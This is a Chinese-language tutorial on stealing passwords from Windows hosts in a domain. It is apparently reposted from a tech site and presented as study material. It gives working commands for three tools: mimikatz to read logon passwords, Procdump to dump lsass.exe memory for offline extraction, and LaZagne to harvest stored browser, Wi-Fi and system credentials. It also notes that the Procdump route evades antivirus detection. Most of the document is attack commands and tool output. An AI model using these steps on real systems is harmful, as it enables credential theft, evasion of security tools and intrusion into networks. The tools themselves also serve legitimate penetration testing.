域內密碼竊取


關於mimikatz

  1. 下載地址:https://github.com/gentilkiwi/mimikatz

  2. 需要以管理員權限啟動,否則執行命令會報錯,如下:


  .#####.   mimikatz 2.2.0 (x64) #18362 Mar  8 2020 13:32:41
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
  1. 使用命令:
  • privilege::debug #提權命令
  • sekurlsa::logonpasswords #抓取密碼

關於Procdump

  1. Procdump是一個輕量級的Sysinternal團隊開發的命令行工具, 它的主要目的是監控應用程序的CPU異常動向, 並在此異常時生成crash dump文件, 供研發人員和管理員確定問題發生的原因。
  2. 不會殺毒軟件查殺,可使用 procdump 加 mimikatz 來躲避殺軟檢測。
  3. lsass.exe進程用於本地安全和登陸策略,可在進程中查詢

  1. 命令如下:
  • 將目標的 lsass.exe 轉儲成 dmp 文件
  • procdump64.exe -accepteula -ma lsass.exe lsass.dmp

  • 需將lsass.dmp移到mimikatz.exe同目錄
  • 使用 mimikatz 從轉儲的 lsass.dmp 中來讀取明文密碼
  • mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

  1. 使用管理員權限打開,否則會報錯

關於LaZagne:

簡介:

開源應用程序,用於獲取大量存儲在本地計算機上的密碼
下載地址:https://github.com/AlessandroZ/LaZagne
使用前需要安裝python3和庫:pip install -r requirements.txt

運行lazagne.py:

>python lazagne.py

usage: lazagne.py [-h] [-version]
                  {all,browsers,chats,databases,games,git,mails,maven,memory,multimedia,php,svn,sysadmin,windows,wifi}
                  ...

|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|

positional arguments:
  {all,browsers,chats,databases,games,git,mails,maven,memory,multimedia,php,svn,sysadmin,windows,wifi}
                        Choose a main command
    all                 Run all modules
    browsers            Run browsers module
    chats               Run chats module
    databases           Run databases module
    games               Run games module
    git                 Run git module
    mails               Run mails module
    maven               Run maven module
    memory              Run memory module
    multimedia          Run multimedia module
    php                 Run php module
    svn                 Run svn module
    sysadmin            Run sysadmin module
    windows             Run windows module
    wifi                Run wifi module

optional arguments:
  -h, --help            show this help message and exit
  -version              laZagne version

啟動所有模塊,可抓取所有支持軟件的密碼

laZagne.exe all

#要解密域憑據,可以指定用戶Windows密碼來完成。否則,它將嘗試將所有已找到的密碼作為Windows密碼使用。
laZagne.exe all -password ZapataVive

僅抓取一類軟件,如:僅抓取瀏覽器密碼

laZagne.exe browsers

抓取特定一個軟件的密碼,如:火狐

- laZagne.exe browsers -firefox

將找到的所有密碼寫到文件中

# 普通txt為-oN,Json為-oJ,所有為-oA
laZagne.exe all -oN
laZagne.exe all -oA -output C:\Users\test\Desktop

幫助命令

laZagne.exe -h
laZagne.exe browsers -h

詳細模式

laZagne.exe all -vv

安靜模式(標准輸出上不會打印任何內容)

laZagne.exe all -quiet -oA

支持軟件


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM